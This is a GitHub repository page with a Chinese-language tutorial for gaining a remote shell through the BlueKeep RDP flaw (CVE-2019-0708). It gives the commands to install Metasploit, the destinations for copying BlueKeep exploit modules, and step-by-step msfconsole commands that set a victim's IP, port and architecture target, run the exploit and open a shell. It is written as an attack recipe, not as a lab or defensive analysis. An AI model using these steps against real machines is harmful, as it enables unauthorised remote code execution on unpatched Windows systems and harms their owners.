Skip to content

CVE-2019-0708 RCE远程代码执行getshell教程

Notifications You must be signed in to change notification settings

0x6b7966/CVE-2019-0708-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 

Repository files navigation

CVE-2019-0708-RCE

kali安装更新 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ chmod 755 msfinstall && \ ./msfinstall

下载攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

利用过程:

msfconsole

reload_all

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

使用set RHOSTS 受害机IP设置受害机IP

使用set RPORT 受害机PORT设置受害机RDP端口号

使用set target ID数字(可选为0-4)设置受害机机器架构

set target=3

exploit

shell

image

About

CVE-2019-0708 RCE远程代码执行getshell教程

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published